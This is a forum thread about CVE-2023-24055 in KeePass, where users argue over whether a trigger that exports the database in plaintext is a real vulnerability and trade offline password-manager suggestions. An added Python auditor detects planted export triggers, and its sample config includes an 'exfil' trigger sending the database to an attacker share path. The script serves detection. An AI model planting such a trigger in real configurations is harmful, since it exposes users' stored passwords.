A good offline password manager recommendation

Hello!
I have been using KeePassXC and KeePassDX on my PC and Android respectively. But after reading about the vulnerability in KeePass, and their devs refusing to fix or acknowledge it, I am looking for a good alternative. Nothing fancy, just a good, simple and secure password manager.
Thank you!


Can you please delete this thread? Turns out only KeePass vanilla is affected. XC and DX are fine…

1 Like

We can keep this, maybe others like the info.

ref: https://nvd.nist.gov/vuln/detail/CVE-2023-24055

That’s not what’s happening though. The developers pointed out that the vulnerability is not within scope because it requires access to the computer in question, and if you have access to the computer you can do much worse things, like run a keylogger. Thus fixing the “vulnerability” won’t actually improve security in any way, but it will mean that people can’t make automatic backups of their KeePass database anymore.

They also explicitly named a workaround in the very first reply: https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/#1914. And they linked to more details here: https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/#913a.

People also point out that you can force-override this config as an admin user: “KeePass / Discussion / Open Discussion: someone can read the passwords using export trigger”.

And it only relates to the original KeePass on the desktop anyway; it’s not a database format issue or anything, and it may not even apply to KeePassXC or KeePassDX. (You should do your own research to see if they offer similar features and let you disable them, if you are truly worried about someone on your computer editing your KeePass config file but not just installing a keylogger.)

Edit: I see now you mentioned it only affects Vanilla, I missed that.

4 Likes
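The two positions above come down to a single question: can a trigger in the user-writable KeePass.config.xml still run, or has an enforced configuration switched the trigger system off? The script below, an added example and not code from the KeePass project or from anyone in this thread, audits a KeePass 2.x configuration for exactly that. Everything about the file layout is an assumption taken from KeePass documentation as remembered here (the path Configuration/Application/TriggerSystem/{Enabled,Triggers}, the Name/Enabled/Actions/Action/Parameters children of a Trigger, and the enforced file name KeePass.config.enforced.xml); both sample configs are constructed for this example, and the Guid/TypeGuid values are placeholders, not the real type identifiers.

```python
"""Audit a KeePass 2.x config for a trigger-based export and for the
enforced-config mitigation. Added example; element layout and the enforced
file name are assumptions, sample configs are constructed, GUIDs are placeholders."""
from __future__ import annotations

import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: user-writable KeePass.config.xml into which someone with
# write access has planted a trigger whose action exports the open database.
USER_CONFIG = """<Configuration>
  <Application>
    <TriggerSystem>
      <Enabled>true</Enabled>
      <Triggers>
        <Trigger>
          <Guid>AAAAAAAAAAAAAAAAAAAAAA==</Guid>
          <Name>exfil</Name>
          <Enabled>true</Enabled>
          <Events><Event><TypeGuid>EVENT-TYPE-PLACEHOLDER</TypeGuid></Event></Events>
          <Actions>
            <Action>
              <TypeGuid>ACTION-TYPE-PLACEHOLDER</TypeGuid>
              <Parameters>
                <Parameter>\\\\attacker\\share\\db.xml</Parameter>
                <Parameter>KeePass XML (2.x)</Parameter>
              </Parameters>
            </Action>
          </Actions>
        </Trigger>
      </Triggers>
    </TriggerSystem>
  </Application>
</Configuration>"""

# Constructed sample of the workaround the developers pointed to: an admin-only
# enforced config (assumed name KeePass.config.enforced.xml) that switches the
# trigger system off. Enforced settings take precedence over the user config,
# so a trigger planted in KeePass.config.xml can no longer fire.
ENFORCED_CONFIG = """<Configuration>
  <Application>
    <TriggerSystem><Enabled>false</Enabled></TriggerSystem>
  </Application>
</Configuration>"""

# Heuristic markers of an export action (format names, paths, URLs), used
# because action types are only identified by a TypeGuid not reproduced here.
EXPORT_FORMAT_HINTS = ("keepass xml", "keepass csv", "generic csv", "html")
URL_PREFIXES = ("http://", "https://", "ftp://", "ftps://")


@dataclass
class TriggerFinding:
    name: str
    enabled: bool
    parameters: list[str] = field(default_factory=list)

    def looks_like_export(self) -> bool:
        for p in self.parameters:
            low = p.lower()
            if any(h in low for h in EXPORT_FORMAT_HINTS):
                return True
            if "\\" in p or "/" in p or low.startswith(URL_PREFIXES):
                return True
        return False


def trigger_system_enabled(config_xml: str) -> Optional[bool]:
    """True/False from Application/TriggerSystem/Enabled, None if not set."""
    node = ET.fromstring(config_xml).find("./Application/TriggerSystem/Enabled")
    if node is None or node.text is None:
        return None
    return node.text.strip().lower() == "true"


def list_triggers(config_xml: str) -> list[TriggerFinding]:
    """Every Trigger with its name, enabled flag and flattened action parameters."""
    root = ET.fromstring(config_xml)
    out = []
    for trig in root.findall("./Application/TriggerSystem/Triggers/Trigger"):
        params = [p.text.strip() for p in trig.findall("./Actions/Action/Parameters/Parameter") if p.text]
        out.append(TriggerFinding(
            name=(trig.findtext("Name") or "").strip(),
            enabled=(trig.findtext("Enabled") or "true").strip().lower() == "true",
            parameters=params))
    return out


def audit(user_config_xml: str, enforced_config_xml: Optional[str] = None) -> dict:
    """mitigated: enforced config disables triggers, so planted ones cannot run.
    exposed: no enforced disable and an enabled export-looking trigger exists.
    unprotected: no enforced disable; nothing planted yet, but whoever can write
    KeePass.config.xml can add a trigger (a user-level Enabled=false is not
    trusted, since the same writer can flip it back)."""
    if enforced_config_xml is not None and trigger_system_enabled(enforced_config_xml) is False:
        return {"verdict": "mitigated", "triggers": []}
    suspicious = [t for t in list_triggers(user_config_xml) if t.enabled and t.looks_like_export()]
    return {"verdict": "exposed" if suspicious else "unprotected",
            "triggers": [t.name for t in suspicious]}


if __name__ == "__main__":
    print("user config only:    ", audit(USER_CONFIG))
    print("with enforced config:", audit(USER_CONFIG, ENFORCED_CONFIG))
```

Run against the real files, the point of the check is the third verdict: an installation with no triggers is not safe on its own, because the same write access that would plant one is still there; only the enforced file, which the normal user cannot edit, turns the export path off.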

This is a very bad take. Security and privacy are not an on/off switch. If you think preventing access to your computer is the only security defense, I think you are mistaken. There are layers to security. Why use a password manager at all then? Just paste your passwords in a clear-text file if you think the only defense should be access to the computer.

That’s not what’s happening though. The developers pointed out how the vulnerability is not within scope

The database, a password manager is supposed to secure, is not within scope? WOW.

Not at all true, and as a password manager, their only duty is to focus on the security of their software, not my overall security, which is my responsibility. This is basic UNIX philosophy.

And all the workarounds don’t matter, as software should be secure by default, especially when it’s their only selling point.

1 Like

Great, so once the attacker is in and installs a key logger, what’s the defence (assuming the database is encrypted)?

1 Like

Well, if the database is encrypted properly, with a good master password, they won’t be able to get all my passwords…

Ok, they only get your master password when you type it, right? Then they exfiltrate the database… and decrypt at their leisure, yes?

1 Like

Bruh, you are assuming a lot of things, like the attacker is very sophisticated, is targeting me, I allow open ports, etc…
Most people getting hacked are not targeted, and are mostly attacked by scripts. Most people who use offline password managers also manage their own backup, either online or offline, or both. So if I upload my database “not knowing it has a vulnerability” to a cloud provider which gets compromised, all my passwords are compromised too. Or if I store it on an unencrypted SD card (thinking I don’t need to encrypt my SD card as it only has my passwords, which are encrypted) and it gets lost or stolen.
Does F-Droid store my password in plain text? According to the attitudes of mods here, seems so…

Saying that they can plant a keylogger, I can also say remove the password from your PC, as, if someone can enter your house, they can plant a hidden camera or a physical logger. That is what I meant by layers.

The whole reason a password manager exists:

  1. to generate difficult-to-guess passwords with high entropy.
  2. to store them securely.
    If you think encryption here doesn’t matter, then why use password managers at all?

Wasn’t this the whole idea? Didn’t you say it was about layers? The “vulnerability” is real ONLY if that assumption is true… if it’s not then there’s no vuln to talk about.

They can store it as securely as the rest of the system, yes. The extra encryption might help or be easily avoidable, depending on “threat model”.

Wasn’t this the whole idea?

Bruh, did you even read what I said above? If the password is stored safely, most people won’t be affected, as most attacks are not targeted nor sophisticated.

Didn’t you say it was about layers?

Exactly, that’s why I want my passwords to be encrypted. It’s an additional layer of security.

The “vulnerability” is real ONLY if that assumption is true… if it’s not then there’s no vuln to talk about.

Today, yes. Two weeks ago, there was no known threat. A week ago, there was. Tomorrow, just the file might be enough. That’s the whole point. There is a function in the software that can spill passwords in plain text. KeePassXC’s and DX’s devs saw this as a problem and removed it, as this is an unwanted, unnecessary and dangerous function.

They can store it as securely as the rest of the system, yes.

You can’t even compare the attack surface of an operating system and just a piece of software in it. It is dumb to rely solely on the security of an operating system which has millions upon millions of lines of code.

The extra encryption might help or be easily avoidable, depending on “threat model”.

Exactly. My threat model requires a safe and secure password manager. It’s the devs’ only job. Being a password manager dev, being responsible for encrypting my database properly, and then, when alerted about the issue, saying to secure my PC instead of fixing the issue is dumb.

Doesn’t matter, I use XC and DX as they follow the UNIX philosophy. They are not affected. Just delete my account from this forum, as for some reason there is no option to do that. I suspect that’s against GDPR…

1 Like

Discourse is odd indeed.

Would you like to be anonymized (posts stay but username is random)?

Sure.
post must be 10 characters post must be 10 characters

Done 🙂 🙂

I think Enpass, Zero and One Key are not bad. They are offline password managers.
They have wonderful features, but not for free…

It would be great if you guys had found a free one. Please share it with me. Thanks in advance.

KeePass, KeePassXC and many others are free and offline.

Just remembered this one: Lain - Minimal, secure & portable password manager.

This is for PC, Windows though.